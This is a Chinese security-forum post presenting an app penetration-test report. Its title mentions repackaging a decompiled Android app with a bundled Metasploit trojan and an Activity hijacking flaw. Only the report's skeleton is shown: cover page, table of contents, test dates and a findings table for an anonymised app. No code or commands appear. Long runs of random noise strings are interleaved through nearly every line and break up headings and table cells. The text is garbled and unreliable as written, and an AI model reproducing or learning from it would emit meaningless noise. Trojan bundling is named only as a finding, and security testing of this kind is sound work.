找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 4366|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
( t1 D' W& ~/ N1 G9 Z) d9 w 9 K( `) \) ?8 B2 Q6 m7 k; P

/ [7 f3 O+ F6 A$ N% q2 Z7 m' _$ Y, U+ K9 B2 B! u& h
; s9 m0 q0 K! ~- ?2 \ ! g2 O( c B8 k3 r9 H2 ]- Q1 {

& i9 O6 @: ]3 p* b ' }5 @9 D9 I. N
2 U% q6 f) }$ D$ D" X- g- ~ 3 y g" |% v& b6 {

8 K( a. S5 g9 e9 R; J 4 J5 A* T3 q9 N1 A% T( Q# m( z# G 文档编号:                ' K7 u' z7 H+ u1 H 9 X, G+ P; x! J9 |, \0 Z2 L# ]

7 J5 {3 j4 V+ o; L! [: Z 6 b' N$ w7 \2 c6 h' _% w

! t- W, H& u1 o+ _. @: [& Y + q5 R L2 r- |& [! s+ x! K7 w   8 r+ Z+ U" f, f. t, F1 C * P3 @& N" T+ r1 b8 e. }% V

! ]" T' E( o5 v0 \, @( {4 B3 ^8 u( W% Q3 v

) ^. |! n6 @9 L, Z) O& y * Q( g: _; R- K   4 d# A9 N* v- H% G+ H/ z 7 Q( ]# f3 z4 C8 p& W

1 J) {: N! J4 i) _* o3 R 0 I z+ i0 a7 P- n" H

1 Y9 T+ I r2 y& n 2 ^* Y2 u6 i) w6 O( a( a u   . \# ~: `* d" R & N9 B9 L6 ~* y" o% O1 N

3 C. ~' f% b* G e0 ?4 p " \* W$ j J, r* ^5 E8 V# A

1 f k* }- f: Y- ^ : {! `1 w% b) Z   ' U% M' w7 [" G4 P2 m + \: C7 c- S/ D3 q7 v8 M* ]- Y! V |

9 n) M% Z5 W/ `: B# | ; N. ~, |$ R( U ~& [6 J; I" K" @; r

_2 q- b8 j+ ^' b 4 t, ^3 Q, x K5 T0 L   6 x4 T3 K" `9 T o* O# u2 L* B7 N , C7 S! Q( s+ F. W( T+ X3 E

0 ^ N# Q0 z# S( G3 J9 q( V ! z$ W8 f: f! g6 `- Z

1 I9 X4 P; G7 Z8 r8 r" n # Z0 y0 T% [, l: T: c# g% j 某某某APP渗透测试 + e9 D- Q6 t9 M ( P8 Z1 t: i# [0 Z

. L+ j) z) R8 D' y9 {' X1 k9 k% O 9 q! h2 O( Q# r, j5 k

$ |2 ?6 v+ w# D- n; M) O: V! x* P p$ s i- C J b! `, H   * _! d. ^+ w( f( x 8 b! ]1 W+ z+ p4 g( T/ x

# x g/ h+ y$ D: E - B+ H' |# ?7 N

2 D9 Q6 ` _9 S/ k ( G; o; B4 l5 V; v) `   + {6 h: x8 u# W3 u9 V6 G3 O9 P9 ]; Q

" l- y4 Y9 E# q" X' Z5 h 4 I" ]$ G2 a+ @+ s* y. I1 Q$ y9 C

! j7 \: j1 l# h+ t. P O" D0 f 8 `& |! D: e- \& A; p) A! k   9 o1 t5 m* C: Z W6 O J# [# m2 U" |& m2 ^6 g' t( K; p

+ B% a+ Y3 j, K7 R. P 4 ^" N% d6 s7 E' d

8 }3 l# x# X7 a) ~8 d' c! Q) g- G0 y _. Z3 U5 ^" I: v4 V$ s p   7 V+ _/ j# c' Y6 h, Y+ Y& o . ?6 G; B( j! s' I/ S2 l+ {

u4 a! T, E: A6 ^! M8 `" n q 7 c; V R% J7 R

! }! X/ ~$ Y4 M3 F . Y# W# o3 A$ y; u& M1 a. i% T 技 术 报 告 7 t% D6 n3 O$ J; I1 G5 t A, p5 X5 m% L/ D, Z, R

( U3 ?; x- ~7 j, [( z+ D* R$ Q8 ^! ~" s) l# N/ C( }

! {' u' m# [6 ~5 L( Z* O! b 3 ~# J$ T- T! @; }* e, s( R: N @$ q   4 \8 b6 F) i% _3 t |- ]: J+ Q* o: c- I 2 l/ Z5 C- ]5 v- B) T! W

- f$ ]( l4 l. ?# I& }7 B D/ o. e+ v6 w. Q

: n) h$ u b2 \3 ~+ _ & |$ u9 _5 W% ~/ d9 T   / O1 L4 [: ^( T 2 t }9 C+ g9 y

6 M* o0 p3 a w* G2 C + B/ s' g" _2 m8 i' ^$ ^

* ]+ A8 O2 F8 W [6 H3 i 9 Z( |8 y- f0 G) L   / A! u8 a# t2 T9 L& j 8 R3 X( S8 N F

6 z; a2 s5 j/ b * u" r: x8 C( @

5 O) \9 u/ h4 d7 {: ^- T 6 ^5 V4 a/ _/ o: D2 f& f7 v9 v   - _& y5 x' A9 E4 l4 ?& W/ ~$ P $ Y! Z6 T# j$ U- X9 S

6 j* V+ Y) {' Y7 Q3 a9 e2 X7 ?- }! T" U+ J9 v- e

& J" L# k' y2 U% w 4 F2 L: u8 Q" Y9 R, q, N9 v   7 r' d3 i9 c; N; h8 o: \% e! p; b $ Y9 G- G5 `8 G

: [! {) H0 Z- H, v. A/ s5 v1 n ; G2 W3 u/ h8 p; `, X

; D& N( y( f0 ]" G9 E$ V 8 D. I9 w5 s" _0 D+ x. l( ^8 \   . s8 V, a5 { m: S) f4 ?. P2 y0 p+ d8 l3 L7 e3 y* X* l

0 U5 r- O. x* X2 x* w$ y ) n! {9 b8 }. M6 o$ `5 Y/ O4 U

$ ~6 g. G9 k; P( ~4 ~ ' C( Q6 E c8 @ \5 r   0 h) N3 |! z' F' z+ b . t: q: s, [; ^' \$ h$ \* P

* k7 i0 ]1 |* S7 O- V8 h 9 ]" y( n' V$ |( Q3 b; H

1 q) ~' I: ]; L3 Q X L( V ( B: N# r, |/ J   V, E4 ]# K. {) u( A9 V7 K. v" F4 \0 n/ l9 g

) v/ M% i$ F2 g; i- u 2 k* l' T7 q7 B0 ?1 b. K: e

% V3 c+ Z2 I+ C1 N 2 G$ s$ [" s2 g' ]& {   2 @1 W% s& R* {! g7 C: V1 q4 e+ h3 ~6 E4 }7 |8 p

- @7 K) G% _& ~" T q. F & J- p- R4 i8 p1 O1 c! h

% e% i( m, d. ^7 p1 D5 W! v( f2 C `: V$ w   4 A' |4 n1 s% K: z5 F; [% G [2 e* h

5 t% V7 [' p0 l) C; F6 F6 Y9 R7 L, F% b$ m% b' F; d

3 ]6 t; T3 A) H, g3 N+ X2 _8 r" i6 S% C# T5 M/ P   5 e+ j9 O- A1 L) D0 R9 K8 @* d# k0 P+ L/ X* D/ W& ?

# H0 n6 z& L( N% D ' L) r) k) }4 e) m0 `

- j* H% ]- ~/ G; `3 B' l! c 6 v+ [. ^/ _. J( [   1 H( o2 `) s; M9 m3 a9 @; \) o$ f * J8 j. W2 ]/ _+ r$ q: T2 a

5 k5 ?1 i( T; D v- I+ h2 q 0 \9 r# x) Y1 y

, Q+ M& l# s# o$ g$ `! W, I3 @* N ( Y0 I2 i5 b' i% m   & F( @- n7 Y, H! r1 q( s! [: \- r* g* b, k& b, ?

; o9 `# Q: q% ?. l / d$ n2 V3 a2 H% U

. g, O5 G/ I9 \' | u G( w/ J8 U 2 B# {- l8 w; v' d' {( J   3 K0 ~: V4 M8 ]2 }. H1 v/ J ( z$ @# J- L, Q p& }

1 U H2 G3 F! {1 _/ T. r* b& D% J. K3 k1 f# |$ E% c

1 {7 |" f- n3 [0 N( X. u 0 s3 l* \# B1 t# H4 W; v   ' i2 _" ~3 f2 |& ^6 Z: g 6 V* i2 @% v0 Q

% g5 Y5 }& m4 w0 t$ q , ?5 \( y2 T1 s$ P6 G- u' \" [3 E

' ]5 k- L7 Q8 ?9 f U, x# l" N- x; \7 A. Z   1 a0 K3 i& \7 {! A8 z Y2 y/ e# c; Z( J* C

7 U; |# v5 U, m/ Q# s1 Z 5 O, n- _! S6 z

( D6 q' z& ]2 E* [ 2 d0 ?, c# a( L* `* P% X( Z   # S6 p6 e$ \4 l$ x' R s0 f . U0 E- X. c8 r2 n! K

x) V* h9 h1 V: t+ ^+ l! {8 l) A p5 _& V/ F/ T

1 q+ L( o' o# ^: D/ y ` 7 w. T5 O3 P E9 _7 }   + D9 |" K! k5 d5 B) [ ! p0 y! W' u( c( M4 ^3 E

( o. k" f( _6 K1 ^0 T3 B - q2 }+ y+ z8 P8 x

+ V, Q0 a) d( {+ b/ T$ }8 A p6 q: O' |) {5 o 二〇二〇年 , z) |1 q8 B7 G; [ H; J7 g7 o$ v/ z

! I; L n7 n( Q( H. Z - v& |. }+ m' A/ l% f9 _
: n8 h j9 O& I/ n% K- | c. T( B2 ?% b0 M+ `6 d0 _
& E; V& M/ E' S, f5 E6 x9 _( L5 W5 k + F9 O9 W, [9 ?' X! J
& \6 `8 A, p3 U! h# b ( l4 x( x4 F, ^8 ?
. O1 }/ q$ F& P* [+ ]' a" D, y+ E- Q
/ `0 Z. o! j% a2 L % P! i% l* D1 M
. m4 C3 F- @1 E1 ~& }6 h0 O, w+ {3 E+ p
1 P( m/ R- k! G$ r1 f$ T' E% j' @4 e* c- x- A M7 M
! `8 e$ q5 j( T0 X& z6 |* J6 |0 S+ h6 @6 ]

" P) [5 x6 D+ m# M8 o! q8 o f3 G/ L! d3 d' N 目 录 0 A5 ~8 c! F4 U# T$ I' i( `: j( R; ]$ R% ] Q |2 n

4 x9 w$ a% o' i1 i0 x" W ~ ; L; y% D8 B9 i4 z, v/ m# U2 x 4 y; X8 ?+ Q: Z/ v0 F2 I5 C / g4 u! v- b W0 A

" }# G" Z/ ?* k. Q 9 w& F# r4 x1 a- n7 _   * {2 O$ ~3 v+ R4 f8 c; z; [( g& z1 X+ E& D, _( w# x4 w1 S; z

0 E3 q* O* E/ V4 ^1 O & t2 s( K! D8 \9 k1 c J* h, `

, o) B: g: G3 E# Y% f6 g 5 J/ W# R- t9 [& t# s8 P" ^+ E& V# b! r 1 概述... 3 : f$ Y9 z1 \+ E# X; l6 k- R, C: B. n- e, [

# [! l8 S9 m, p! a& W( o5 ^: \0 z+ \: `" _

: H9 v. l3 m" [, n 6 Q& Y5 h1 U" T# [* X' C# I 1.2测试时间... 3 ! U5 ~) m* H1 B$ \ # Y! d; g& W3 W, w6 z" O8 R

6 | L; |3 l) ]( _, D5 y 3 F( e5 g$ z3 j

% K$ j1 r- M @- c( j% e0 J H 5 D) n9 ]. e& b7 ?/ `1 v 1.3测试对象... 3 . Q! g- q5 d! ^3 s4 l l: l! g9 `# e! l' k `

0 O$ b# [/ ^+ V" b1 ^; t5 q ( L" r* ~% B4 E" d

& [9 j5 @* U3 T5 m# M- F. i, ^1 v - S$ A% B- M' a/ @, _) j+ n 1.4测试结果... 3 * e$ n$ O& {- Z # q/ _( w5 n/ y' \& B1 @

0 K/ w' @. J! ^+ J6 t7 p! i, O - z9 h4 M4 V$ [# T% S! w7 \1 I. H

; p" P8 g* A, ?2 m4 D5 d* k- C 5 p2 J1 Y: H; ~$ t- d: ~ 2 检测结果... 4 8 d: r s+ H- ^$ q5 s - c/ k4 |+ c2 S! H& s( N

$ P6 B" e" D5 \' |% ` % S! ^+ t% ?+ I3 \0 r9 Q% R

1 u$ n& @ ]! p) K* [& ]( V$ ^% a 2.1 某某某... 4 / D. V+ d, q$ n% r ! O% z% H% G1 v: N

' k+ ~4 a- N5 S9 _4 T8 w8 K" I , G7 z9 U7 }* v9 d/ O

- ]2 f- j# P. n! L P p; J; p* B, g, c 2.1.1检测目标... 4 ) J2 t6 T2 S) T, ?; t8 S) ^2 R F- `8 b

) e J5 J* i0 A1 \ 3 y+ R P3 }2 v- v; D3 ]: _

* ~' b9 l+ T* B4 ] : r0 q2 F8 |# j. e7 n 2.1.2检测结果... 4 , W- M! b E; Q0 e1 U1 s+ |: P! j2 \9 h& ~5 E! d

1 D; v) _ |) q9 Z! h 3 U/ i* E, E8 e u

. d# Z* {9 Q7 k3 S- B' x% A' `7 @) @4 W2 @2 V7 b1 S9 d 2.1.2.1. 4 h l! W0 C7 R2 h" k" D/ L* I2 B8 l

* r4 D2 h, i6 M" U" w% ~ 3 H( o- J/ Y1 K% h" N' |

+ r# e# W% N* X3 a: |" [1 [ 6 C. C+ l% v9 x. z( c2 _ 2.1.2.2. 6 2 D- b: Q- A- ~. [6 m $ A8 `4 d* Q( C2 k# g4 I% S

; T# h" M6 M2 N9 p ( m4 p' W6 K5 s( H+ Z

2 j1 ?# }0 w. S8 g# Z. Z- f. y) n7 `1 g3 G9 l 6 v6 j j; Z; M/ u. |! b6 z - o! |6 _4 h; s9 v: a

* k5 C" u r. U" L. ^0 M3 j L ' _+ l5 ]' i- c8 T: C, e3 r
6 e0 a: W# k0 l* @ 9 c2 P/ I/ N9 ~6 O! x( ~" Z& V ~1 z
c/ X& A* u% k. Z. E' y0 l ! s2 ]4 j# j" b- q& L p
* x/ ~* b& x7 Z( D! ^0 `# n5 | 2 b3 q# }: ?3 A ~2 E
3 @9 V* M- n$ B. X' m1 s. R { 4 i7 d3 V% J; M1 t# c

8 `. L2 g3 V$ _# m1 ` 7 z5 h) r {' i, @, G% ^, o* f 1 概述 - H: I3 a7 W" a r ( Y. e/ C$ H8 Y: x: V1 _3 A

. B+ p" S3 j- W' {4 }) N5 E/ N. ~+ l5 ?- ?

) ~, I% Q1 r0 r/ |: f0 r; B , F! E. ]* c3 L3 J# I' S% q" x 1.2测试时间 S+ v$ e2 a& }+ [4 C H y 3 C, D7 N; a+ W9 W5 C

! n6 A: y' e8 O4 G1 D7 q 5 Q' }4 `9 h( A% L " K( \$ l1 c+ T8 g7 e' ~, O3 M5 a, s- i- Y5 v! |0 _4 y: @/ f+ W7 v1 B2 w' d( w1 `2 _, a n7 {& U Z0 Z! j# D: |& p2 a2 n$ X) D+ R- `# q' k' ]: Q u$ D) [4 M& s3 l8 M4 |* R* [4 D8 t. h9 R5 t1 S: k( D2 r3 J, D# c9 \. E- K2 d$ z0 T D9 j$ K: s8 q! Q3 E' k, W7 V' ]* P" Z8 I5 y) p7 s! F/ n: C" a$ z+ o8 j$ n& x4 ^/ L6 n7 s7 R( s$ y3 t. w3 G: [1 D! M# o7 Y( ^# o8 h+ U4 [' \) l C% u4 Y0 ^8 J6 U# o( K' G* S2 x/ n9 S* q. X; [6 Y Q& ?$ O4 l* X0 B& p, K- X0 n, z. @ ~1 c9 w0 s) f4 ]; R9 V6 S* u2 a! m( [8 b* K% d0 q; I. W1 r% I& X/ O) S. ?5 V0 M6 X4 x8 y' g& _$ r6 @9 p+ k1 P' `' U/ \" U. |/ V2 u/ b# ]" Y4 p6 l/ H+ y) _8 n3 Y" w! ?& V) l# a/ E( n0 f7 a- K% G+ n/ _! |& J- T% m2 F$ r1 F# ?9 h+ p7 o
' g! S$ p0 ?' u. V f - B" w7 p$ m0 Y4 g u3 ?2 f+ l

! r9 e' w1 D7 B, }2 X 4 S; b3 r$ d8 M, |7 l6 ^ }( J 渗透测试时间 5 |- a! }: H8 _7 F K* s9 k5 u8 b+ I' p/ l

" _' I% t) ?, d; c 6 W; u. l Z9 L3 b
' @" R7 U" z d) j l! Q : |' n. J5 G3 W8 p- W, x. D4 P% j, {

, }1 [ U, J1 Q2 m& {( e" d 1 K# j6 F* j( H2 \0 {* s 起始时间 / t7 l, G- \: J) |/ H& S , w2 e/ D" N" e" u

2 |' k6 [8 {5 M 5 Z; s0 r2 C0 I; O1 o* o+ f
0 I" V! h4 I. T O3 v. q& J4 M4 t) h/ g% e

4 v; v* ~( |' e7 z) k" S$ [" `- I! R% D! D; x+ G4 h! h" R K 202046 ) z1 g3 y, _$ k, P " q! @* `' b! c3 y: e

) V: e+ e7 ~3 V6 q' ? . q5 i8 f3 P! z
0 B, `3 I2 _( E( h4 [ ' \% l* Q$ l5 _* M( U4 I4 O

( w) k6 J1 G3 u) m' m# H 1 m9 J! C0 b5 _9 c7 g, F3 z# ] 结束时间 9 D$ y! h: S+ e' z0 k , i* P! q0 `0 l2 n! f7 J% ^1 ]+ j

" S4 B* m/ ~, c2 w ; j6 ~+ B# Y2 X+ c2 S/ d
" x& O" U( U: A 7 I2 |% r$ m: M3 }4 g& {, e

) X0 W0 B/ L7 V 1 n0 [+ h \( f# g4 d% T 202049 ) o0 [9 T$ C/ x7 ?/ l4 J 5 ]8 E7 b5 }& y

, ~% t0 ?# f A # y$ z$ r5 q) {' {" W
8 n1 c7 i) G. w 6 b8 q6 Y" T0 m! R. c$ N- f

" }- x$ ?4 s) W& k/ G1 Y" h 6 v' N5 d8 U6 k$ I+ J# u 1.3测试对象 O8 T6 d! b1 u" w, H - e) k1 m. T. w5 ]" n' r

7 d8 t, C2 E. ~6 p7 J; _ a9 C 0 w3 I4 W8 O; n, W

: G9 W% @7 d( }& w9 r/ z + ?* `0 h8 C' W2 [1 q# m, H 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: 9 q0 D( l4 }4 p3 T 0 p ~; l& ~- g q t" V

( ]: [/ w& r+ ]2 q+ g0 K/ o9 s7 ? 7 a Q% S8 |1 s5 g/ d

$ F! M, D6 o0 E" t, W 2 a4 Y; n' L8 A4 t1 o: C! d$ h$ G 1-1 检测对象 0 Z6 A N B$ Q$ Q 9 O+ r- l5 \; J {( A3 @

% m" w6 d! J2 n) A& v2 G+ r; \ ; y& t. g% ?2 ^: E# i 3 {8 f* w) `) R1 T: j, w" h; J7 ^' o$ ^: z8 ^" u: q- u' v. c8 ]. [5 i* u; \5 k3 w; u: J, E- D+ {' U; U- V6 `* w; K8 L+ _' a2 a+ `+ \9 }" B* a& e! y8 T, M" B" x" V( m3 R$ N# R4 ^3 S# v) O$ t( t4 x: J7 }; \+ P# ?& _6 C! Q/ S, H6 n. I5 z) h& x( |7 j& ^% d0 j2 ?) {4 M8 V, i" ?* ]0 v* }8 a7 U8 |7 x2 f' |: Y5 P" y$ n+ g: P7 b9 ]; ]2 W, n9 |8 k% f, d( e6 {$ }; R& F `& z' T$ o, C3 p" V6 ?- d. J( B: y9 n6 V a) q6 C. s) H7 Q' u- u4 m* \! [; _( m8 H( m' D2 X8 O$ n i* O! _8 k8 D- U+ { x8 e7 Q+ T% _: n4 U) L/ e9 | Q4 ]& R+ P) _2 B) G- B3 k b1 f0 l4 W8 h) h: r7 u0 y6 `& S, y7 ]$ d6 `. ?/ W. v/ H6 F* r6 n- H% ?; i/ K/ G/ @+ B u+ |& A* b2 B1 k4 ?& f' g' ]& z) F/ S q L- m# T' K2 S: S' y8 n/ g- q M- ]! _2 R& e( |' i- G
1 f5 b1 n, B5 H# _) p9 V6 o+ O* M ; B" x: @7 _1 s6 `8 i# h

9 `, t% X$ W; G; j Z0 u' S9 A6 n ?( Z: h 序号 % i3 d; Y# d$ E+ h5 m0 D @; y6 ?' K5 I5 `% ?

. ^; F; D) J9 e8 E 4 i! b; E' b1 A b8 z/ t+ L. s
# D C' E3 a! Z6 w3 T- x% q8 Q! f

! z+ ^/ ^6 h( E ( }! `/ n: u5 |8 G 测试对象 7 Q" v% f% q2 x: U6 Z! x( c 5 Z; ^% }9 n' R* Z5 k0 r) |

1 f1 ?: m3 X2 w" r/ _' {8 ~ m! ^. @$ Z% h* C( a) l2 I- |
! p% J) v- _' _, L % M& s6 u& t* [0 L, {( i3 T' a

1 D# S b; ]: E% E' F3 { \ # U* s4 z- A7 ]9 {: A/ N 测试地址 ! E- ^8 Y) b+ v R 9 o; |! A% M. e

2 S% @: E. p/ `+ Q' c7 P) b2 Q 7 Y% n( o) }6 C2 J$ [
0 p p/ T) D' L4 F % k8 a; Z. P/ P7 ]% r ^3 O4 a! ~3 S& L

0 n1 \1 I4 B2 ^' p 5 B' K8 \9 R) w* C 安全漏洞 8 P- ^% [. z9 k* \7 G" q& v3 S$ [# r& F

+ a& F. }3 b0 a2 q/ |) G ( \1 \$ X& w |, g
G$ V+ u5 F4 \$ z( R f 5 t. O3 W; u. y: e+ y: P2 k* j, C

: ~/ h# D) e- j2 b& `# S' @ ; {: K M' Z- j' y2 O0 G# S- O' ^ 1 / r8 ]; x$ r, Y0 `* [- X ! l( x; h+ d, Q3 a/ f: c

9 u$ }' R5 F i% D5 Q% a" R( E3 {) _( q+ A9 T# e
! j: o6 @3 g$ E) r' p( J/ u9 s6 r / s0 S( |7 N5 ~" D. Z

# F" X% n' l, L" H1 n# N, l p 0 P% ~$ g( c9 e8 f" k 某某某安卓APP 3 v. a- r3 w: c1 Z8 S) w 6 C$ A6 L( P, |

6 ]* j+ F* e. N; D: a; C. E# G. J ! O4 a& i* P8 q
5 p, f! Z$ Y" q* M" {% a. X6 ^$ u. J2 d' R5 P

4 B9 A) l, {: A7 f9 o- k; D6 w3 x, E: Y- R   , @2 [/ S, p* `, z* m ( E8 X% V% f' m1 V4 v8 L5 |

& C, S5 l1 z, G$ G& a# y* [6 ^ 2 c& _4 h) m2 l |: t" ~6 T
: ` k: h+ @) f) ` , q( Z+ Q7 i& W* H% }7 K7 Y$ R3 b

5 i+ Y% H1 L+ m# l + U; ?3 [! N2 `: F! Z" e% q2 F 2 + Q% T* B6 X3 i $ W U8 @* e$ v8 C

/ Q9 N6 b R7 X9 [: m2 ? ; o; |1 [/ R% e$ Q! e
9 J5 p" t9 |( \2 `" |' @ + R8 {! E7 k1 l. @2 ]

% }9 G" p; |, r / R' I- n+ q2 Y% C9 T 1.4测试结果 ) v( [1 L3 T8 V) i8 D7 @8 Y7 q; g2 ?+ j5 m6 l& m

0 o- [1 [* c8 y 4 F$ _! l. H' a4 ?2 [1 i' }2 l

0 j2 O8 X9 s' f0 i- J: W" P% ^$ ?% H9 ^ \4 ^1 }0 C4 V: Y 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: , i* C9 k" s/ h* o2 y7 }+ g# Y- ] * u* ~0 g8 G) ?, H$ p

! z) I8 {& E4 t# m; n* a! Z, h3 L$ c' b& B) z9 I8 ? r

, z& Y( ?% @6 }; T ?, N! K- ]1 ~. I7 ~: q   ( X l6 p: [9 p. T5 I8 ^ ! Y- k; {% ~: k1 n2 @ w- c

. T8 J. ]2 T% i& X) K 5 x& v6 z4 U2 L5 u
2 j1 ~! P# D+ s) { 2 l- N+ d! ]0 C5 ]/ d, E4 b ! k9 d& j0 V; c$ O; p+ i+ X# F9 x; Y- |( s3 h& ~& I' f0 L9 ~. P, t+ s% y' d y' j0 u+ Y4 |- u8 t( A' t! ]+ h* o/ I7 A9 n8 g/ R9 S/ b! l1 w- @) D4 `, v8 A" Z" L3 i N- Z7 s% b* t/ }) H& S3 D$ J6 d" e: W! {6 a. @4 m7 q. A4 {/ r0 `* y( M2 ?, n: a: _! T& J7 y5 O' o3 a2 g* {5 h! Z$ D# Y- s1 `# Y/ d4 i3 M0 Z/ O O* e0 M1 ~% ~ N; i5 ]! I6 ]; W7 W7 ?- q8 U0 v6 p# R, g5 h3 S2 q6 |: W; G; u+ ~3 h! ]7 X0 c3 p1 y: d$ }9 @, I5 F |6 G b! |9 d$ L1 @# h! ?+ T6 S7 S5 T$ ?- a3 ?3 W# C9 \2 W+ F3 ?6 Q0 x$ O8 ], T8 `4 Y" [+ U& a3 s; d6 _# l9 K+ C8 @, y2 c$ H( z" u; K) S! C& h: w6 V. e3 K) B, r5 |: t. B# l$ n+ H9 g- w; F7 x$ T) u1 r! u- \9 X: i; s5 {0 ]/ m* t- w# z; \' B: D2 @ d) @+ g7 i9 y; Y7 `6 ?- f3 o/ \3 A# R& k8 w' ?& O/ W1 M c1 W& D/ \, L. m# ^% M( X, ~% M3 a' ~% B( Q. [6 t6 H0 l1 u" W: y, s4 a4 |$ k) D' [5 @' ]4 E$ D9 G, |8 _2 Q, W7 V/ z6 Q+ m$ ^ V1 ~5 n& v: D: {, t; ~! L" T6 ~7 b: P7 w) ` s8 z( ~0 {0 H9 w* w- h. f& p7 r$ I( J8 p" H: d% W8 o; d/ T3 a; i4 r; e0 a7 l1 z# o$ t0 f- s$ [6 Z' y' b/ q0 ]5 t) u. V! g, U% \' u; U- I) N3 V6 R& K9 b+ f6 i5 p5 ^& z' k0 @1 q7 B" A; w6 t* w( S2 J; L
+ ~$ A9 m6 |( o3 G1 m( U% d' {7 n( h. |) A2 ?

3 {* x4 |, [9 l' C- y : k5 Y$ S0 R/ U7 l5 u9 M' m 序号 ; z# l) R# x) v+ M4 b 3 o4 L6 o( F6 Z1 M" ^& j8 w1 k

3 V( C+ \9 A' V$ L/ d 0 L$ P% [* T' R0 @4 U% `
( a7 ~2 x# V9 g5 @2 q) b8 G, w/ R" @ % j( k0 w* Q8 v) `0 \) h% L2 j

( @* r* ^5 O' w# y) M . F! |) o2 u- w7 o* ~& b& @/ v: I; L# y 系统名称 $ X+ B' f9 Y7 {8 C : L( Q1 U+ F4 Y" \

# C% g4 y) s' F" G o5 q6 p ' M1 w @& p: `% Y0 |
" y; V/ \- z: ^1 r3 k* {4 w 0 H" p# C$ H: S

2 j% i$ d9 ?1 y% L+ V! I/ \ + p& x7 S6 H4 S3 g* H. z$ ^; O 漏洞名称 ) O: p+ T6 [) X) V4 U- N 8 N5 F* N. T p; u/ [: K6 m

4 W& w7 ^, C. b+ B$ y5 s q2 _9 q2 H. n Y. n
# W# ^. ?9 P! a! J/ e1 f' K* _- m2 f3 V8 u

3 N/ ]6 }' c4 C1 j" O % E0 i1 ^/ U. r& g$ Z* H 漏洞危害 , i: K- `' Y8 l - g4 H' M' z5 r# b& e3 t$ P7 B

, @, _$ m/ E9 }" R1 k# i5 L, V5 i1 g* O/ E, ^1 K( r0 M
! r# ~; q4 \1 h O / Y$ U6 x: i! ^- @9 s. c

8 d" o3 d5 m& y8 ^, ?* M " X Y- o, w3 H3 ?" S" R 修复结果 6 S7 C9 A! k) q6 A: X! |( M* P( R% ? f: w7 g6 f' G$ o: i: h) N

! A& U% Y! ^! |7 F 2 s0 s! K8 H- F
) P9 F0 Q' f) G1 o9 u , [. Y: O$ j; f# a3 b

( r; [/ \$ a6 ^+ g! ]/ B 4 M7 t- }/ b8 Z1 w/ Y% R$ O3 H5 f 1 1 ?$ m% Y8 m3 T" v 9 T' ]& O |! z

* X7 a# `4 N9 h( ^; L6 A - h8 x K! f* [: S% ?
) `8 z; N6 s5 ]5 I 5 M. w! z6 N) D, v4 z) |2 W

O# A) R5 o7 w- a* C" N 0 [1 F b7 O: c. D. Y 某某某某某某APP / |; O7 R% U2 {2 q! M+ n9 T / c2 ?+ [' C9 q: A0 D( F/ S

7 N, M( U1 T* y3 ^+ G1 } C' x2 r3 x* |6 d5 }8 c# o! f
v- n8 b8 g* w9 S% H6 x& U) b( j1 S% {- I* q& f9 u" T

8 x! @1 h/ ^/ }1 l3 T. S0 l 1 T( K3 g2 x! l8 W. D! z4 ^ Activity 劫持 ( l0 h( j4 {- A8 v / H& m5 W* N5 I: w

/ n9 B l# Q/ z2 ] * ?6 x2 ~8 X5 j& {$ C3 r/ g9 S# q5 \

. n! c1 r) X I2 a " Q" f5 ^+ d8 I) u/ s- j n6 o0 a   4 `! ~ o) B( w0 h ' Y1 t, ]: O! u

: s. y, x8 H3 o* j% W5 q/ `3 Y 6 H2 L9 k3 B: B
- d/ ^0 \4 x# ~* t9 o2 T% C- d$ S/ N1 f; d

4 [# S0 h+ e( R! [; l3 f7 z 0 t( n, r4 ]9 C- W Z0 v K 4 N8 [' r6 z! M6 N0 e i+ H8 j0 q# F0 i' M

4 g5 {$ U0 h9 J1 f2 o: H" e - n, V$ b6 \2 s# m4 d
/ W8 a) ?/ N4 y! ? ' M, H/ p: s3 f2 B. r/ n

, D2 m) q! o8 L5 d5 W/ z ( U/ q1 h% ^8 k8 ]. y   ; n, K& j. Q1 T' O# r " a* |, L* h; G

3 W5 c9 l* `% N 0 B$ b7 E' _4 W2 i- k; H
# i+ t% z4 ^' r; y2 f, \. l$ v" e/ Y / t4 }4 s: W1 y7 Q8 Z4 c

& Q3 _: g7 N/ F8 E d1 r # p) x7 [$ k$ w: {* W4 v1 k7 ] 2 " T' I2 g: c7 A; i, P1 L6 n( K' y ) w" A& {8 T! p5 P* i; Q! c$ r

. q: M& O8 A1 h. e ; y9 h3 D: k- ~: `6 p+ q" a# N' y
& j R' _1 ]% |1 d" O" K1 _- W0 D9 D# J. k, m( J

/ K* n. x* V3 f7 \ ' o5 X9 C& ]; b% U' u3 U0 t8 Y2 y 某某某某某某APP 5 V" h. G+ R1 z8 W# d9 r 8 N5 Y* I% q6 S% k. `4 g2 k2 E

0 |5 t2 ^( I% C$ n0 }$ v: ^$ Q4 W 8 v0 s- `9 S: y/ t
! D7 A4 c2 y* P, B$ Q$ R5 `& j # X t( D) [. n2 X9 T) F0 a f

3 U3 Y$ D4 q {1 T& x $ r" i" O: e; t- H. k 反编译二次打包捆绑木马、篡改APP代码 : i) ~5 d; o. i M- o ! D5 H9 |+ ^$ e7 b

C2 b0 J2 y7 ^0 s / v' F# _5 E7 C" b
~. g4 X, d0 a' ~! V% ?6 q" b' G4 i5 k5 f5 g$ Y3 t3 s. y

4 a7 N6 H0 G8 h2 K1 z6 d% p8 | / V: y2 }) Z6 t7 i 4 Q, B& l/ i/ I; w1 n1 p0 I) R 0 X( W( ^) P4 S. ]( X2 L

; V7 p0 V' m+ {$ O! P3 n. B3 }9 n- c% _
) g- Y8 ~7 K1 M2 C z 8 g* A$ m$ |4 w. U4 j# I4 T

0 _5 N2 U! R& d, n' Z" T 1 F- S; U0 z4 S" z7 `) ^5 ]   1 T9 I- ^ S ? 0 Q& i) F# z. P3 s& u

' ]" E; q# k; M+ Z6 a! N5 s' F 7 l4 _7 p! Z- L: {/ h/ b
% Y. ]! a; V* g( _& u9 z , b) J! A* I O8 r
0 @) d) {3 w% t5 A4 \! t3 w1 X & Z& N" l# H- @$ }, n- e, E

